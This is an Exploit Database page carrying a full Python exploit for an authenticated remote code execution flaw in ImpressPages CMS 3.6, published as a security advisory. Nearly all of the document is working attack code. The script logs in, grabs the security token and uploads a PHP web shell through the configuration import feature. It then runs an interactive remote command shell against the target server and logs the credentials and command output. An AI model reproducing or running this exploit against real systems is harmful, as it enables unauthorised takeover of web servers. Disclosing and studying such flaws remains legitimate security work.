ImpressPages CMS 3.6 - 'manage()' Remote Code Execution

EDB-ID:

29331

CVE:





Platform:

PHP

Date:

2013-11-01


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

#!/usr/bin/python
#
#
# ImpressPages CMS v3.6 manage() Function Remote Code Execution Exploit
#
#
# Vendor: ImpressPages UAB
# Product web page: http://www.impresspages.org
# Affected version: 3.6, 3.5 and 3.1
#
# Summary: ImpressPages CMS is an open source web content management system with
# revolutionary drag & drop interface.
#
# Desc: The vulnerability is caused due to the improper verification of uploaded
# files in '/ip_cms/modules/developer/config_exp_imp/manager.php' script thru the
# 'manage()' function (@line 65) when importing a configuration file. This can be
# exploited to execute arbitrary PHP code by uploading a malicious PHP script file
# that will be stored in '/file/tmp' directory after successful injection.
# Permission Developer[Modules exp/imp] is required (parameter 'i_n_2[361]' = on)
# for successful exploitation.
#
# Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
#            GNU/Linux CentOS 6.3 (Final)
#            Apache 2.4.2 (Win32) / Apache2
#            PHP 5.4.7 / PHP 5.3.21
#            MySQL 5.5.25a
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# Zero Science Lab - http://www.zeroscience.mk
# Macedonian Information Security Research And Development Laboratory
#
#
# Advisory ID: ZSL-2013-5159
# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2013-5159.php
#
# Vendor: http://www.impresspages.org/blog/impresspages-cms-3-7-is-mobile-as-never-before/
#
#
# 12.10.2013
#

ver = '1.0.0.000251'

import itertools, mimetools, mimetypes
import cookielib, urllib, urllib2, sys
import logging, os, time, datetime, re

from colorama import Fore, Back, Style, init
from cStringIO import StringIO
from urllib2 import URLError

init()

if os.name == 'posix': os.system('clear')
if os.name == 'nt': os.system('cls')
piton = os.path.basename(sys.argv[0])

def bannerche():
	print """
 @---------------------------------------------------------------@
 |                                                               |
 |                 ImpressPages CMS 3.6 RCE 0day                 |
 |                                                               |
 |                                                               |
 |                       ID: ZSL-2013-5159                       |
 |                                                               |
 |              Copyleft (c) 2013, Zero Science Lab              |
 |                                                               |
 @---------------------------------------------------------------@
          """
	if len(sys.argv) < 3:
		print '\n\x20\x20[*] '+Fore.YELLOW+'Usage: '+Fore.RESET+piton+' <hostname> <path>\n'
		print '\x20\x20[*] '+Fore.CYAN+'Example: '+Fore.RESET+piton+' zeroscience.mk impresspages\n'
		sys.exit()

bannerche()

print '\n\x20\x20[*] Initialising exploit '+'.'*34+Fore.GREEN+'[OK]'+Fore.RESET

host = sys.argv[1]
path = sys.argv[2]

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))

try:
	opener.open('http://'+host+'/'+path+'/admin.php')
except urllib2.HTTPError, errorzio:
	if errorzio.code == 404:
		print '\x20\x20[*] Checking path '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
		print '\x20\x20[*] '+Fore.YELLOW+'Check your path entry.'+Fore.RESET
		sys.exit()
except URLError, errorziocvaj:
	if errorziocvaj.reason:
		print '\x20\x20[*] Checking host '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
		print '\x20\x20[*] '+Fore.YELLOW+'Check your hostname entry.'+Fore.RESET
		sys.exit()

print '\x20\x20[*] Checking host and path '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET
token_chk = opener.open('http://'+host+'/'+path+'/admin.php')
response = token_chk.read()
match = re.search('(?<=security_token=)\w+', response)
sectoken = match.group(0)

print '\x20\x20[*] Login please.'
username = raw_input('\x20\x20[*] Enter username: ')
password = raw_input('\x20\x20[*] Enter password: ')

login_data = urllib.urlencode({
							'f_name' : username,
							'f_pass' : password,
							'action' : 'login'
							})

login = opener.open('http://'+host+'/'+path+'/admin.php?action=login&security_token='+sectoken, login_data)
auth = login.read()
for session in cj:
	sessid = session.name

ses_chk = re.search(r'%s=\w+' % sessid , str(cj))
cookie = ses_chk.group(0)

print '\x20\x20[*] Mapping Session ID '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Cookie: '+Fore.YELLOW+cookie+Fore.RESET+'\x20'+'.'*(46 - len(cookie))+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Mapping security token '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Token: '+Fore.YELLOW+sectoken+Fore.RESET+'\x20'+'.'*15+Fore.GREEN+'[OK]'+Fore.RESET

if re.search(r'Incorrect name or password', auth):
	print '\x20\x20[*] Faulty credentials given '+'.'*30+Fore.RED+'[ER]'+Fore.RESET
	sys.exit()
elif re.search(r'Your login suspended for one hour', auth):
	print '\x20\x20[*] Your username is suspended for 1 hour '+'.'*17+Fore.RED+'[ER]'+Fore.RESET
	sys.exit()
else:
	print '\x20\x20[*] Authenticated '+'.'*41+Fore.GREEN+'[OK]'+Fore.RESET
	print '\x20\x20[*] Sending payload '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET

class MultiPartForm(object):

    def __init__(self):
        self.form_fields = []
        self.files = []
        self.boundary = mimetools.choose_boundary()
        return
    
    def get_content_type(self):
        return 'multipart/form-data; boundary=%s' % self.boundary

    def add_field(self, name, value):
        self.form_fields.append((name, value))
        return

    def add_file(self, fieldname, filename, fileHandle, mimetype=None):
        body = fileHandle.read()
        if mimetype is None:
            mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
        self.files.append((fieldname, filename, mimetype, body))
        return
    
    def __str__(self):

        parts = []
        part_boundary = '--' + self.boundary
        
        parts.extend(
            [ part_boundary,
              'Content-Disposition: form-data; name="%s"' % name,
              '',
              value,
            ]
            for name, value in self.form_fields
            )
        
        parts.extend(
            [ part_boundary,
              'Content-Disposition: file; name="%s"; filename="%s"' % \
                 (field_name, filename),
              'Content-Type: %s' % content_type,
              '',
              body,
            ]
            for field_name, filename, content_type, body in self.files
            )
        
        flattened = list(itertools.chain(*parts))
        flattened.append('--' + self.boundary + '--')
        flattened.append('')
        return '\r\n'.join(flattened)

if __name__ == '__main__':

    form = MultiPartForm()
    form.add_field('spec_security_code', '12345678901234567890123456789012')
    form.add_field('spec_rand_name', 'lib_php_form_standard_1_')
    
    form.add_file('config', 'liwo.php', 
                  fileHandle=StringIO('<?php echo \"<pre>\"; passthru($_GET[\'cmd\']); echo \"</pre>\"; ?>'))

    request = urllib2.Request('http://'+host+'/'+path+'/admin.php?module_id=361&action=import&security_token='+sectoken)
    request.add_header('User-agent', 'joxypoxy 1.0')
    body = str(form)
    request.add_header('Content-type', form.get_content_type())
    request.add_header('Cookie', cookie)
    request.add_header('Content-length', len(body))
    request.add_data(body)
    request.get_data()
    urllib2.urlopen(request).read()

print '\x20\x20[*] Starting logging service '+'.'*30+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Spawning shell '+'.'*40+Fore.GREEN+'[OK]'+Fore.RESET
time.sleep(1)
furl = '/admin.php?module_id=361&action=import_uploaded&security_token='

def osys():
	cmd = 'uname'
	execute = opener.open('http://'+host+'/'+path+furl+sectoken+'&cmd='+urllib.quote(cmd))
	reverse = execute.read()
	if re.search(r'Linux', reverse, re.IGNORECASE):
		cmd = 'pwd'
		print Style.DIM+Fore.WHITE
		print '\n\x20\x20[*] Coins: 1'
		print '\x20\x20[*] Detected platform: Linux'
		print '\x20\x20[*] Type \'exit\' to leave'
		print '\x20\x20[*] Choose your CMDs wisely'
		print '\x20\x20[*] Your current location:'
		print Style.RESET_ALL+Fore.RESET
		return cmd
	else:
		cmd = 'cd'
		print Style.DIM+Fore.WHITE
		print '\n\x20\x20[*] Coins: 1'
		print '\x20\x20[*] Detected platform: Windows'
		print '\x20\x20[*] Type \'exit\' to leave'
		print '\x20\x20[*] Choose your CMDs wisely'
		print '\x20\x20[*] Your current location:'
		print Style.RESET_ALL+Fore.RESET
		return cmd

print

today = datetime.date.today()
fname = 'impress-'+today.strftime('%d-%b-%Y')+time.strftime('_%H%M%S')+'.log'
logging.basicConfig(filename=fname,level=logging.DEBUG)

logging.info(' '+'+'*75)
logging.info(' +')
logging.info(' + Log generated on: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S'))
logging.info(' + Title: ImpressPages CMS 3.6 manage() Function Remote Code Execution')
logging.info(' + Python program executed: '+sys.argv[0])
logging.info(' + Version: '+ver)
logging.info(' + Full query: \''+piton+'\x20'+host+'\x20'+path+'\'')
logging.info(' + Username input: '+username)
logging.info(' + Password input: '+password)
logging.info(' + Vector: '+'http://'+host+'/'+path+furl+sectoken)
logging.info(' +')
logging.info(' + Advisory ID: ZSL-2013-5159')
logging.info(' + Zero Science Lab - http://www.zeroscience.mk')
logging.info(' +')
logging.info(' '+'+'*75+'\n')

print Style.DIM+Fore.CYAN+'\x20\x20[*] Press [ ENTER ] to INSERT COIN!\n'+Style.RESET_ALL+Fore.RESET
while True:
	try:
		cmd = raw_input(Fore.RED+'shell@'+host+':~# '+Fore.RESET)
		if cmd.strip() == '':
			cmd = osys()

		execute = opener.open('http://'+host+'/'+path+furl+sectoken+'&cmd='+urllib.quote(cmd))
		reverse = execute.read()
		pattern = re.compile(r'<pre>(.*?)</pre>',re.S|re.M)

		print Style.BRIGHT+Fore.CYAN
		cmdout = pattern.match(reverse)
		print cmdout.groups()[0].strip()
		print Style.RESET_ALL+Fore.RESET

		if cmd.strip() == 'exit':
			break

		logging.info('Command executed: '+cmd+'\n\nOutput: \n'+'='*8+'\n\n'+cmdout.groups()[0].strip()+'\n\n'+'-'*60+'\n')
	except Exception:
		break

logging.warning('\n\n END OF LOG')
print '\x20\x20[*] Carpe commentarius '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] File '+Fore.YELLOW+fname+Fore.RESET+'\x20'+'.'*19+Fore.GREEN+'[OK]'+Fore.RESET
sys.exit()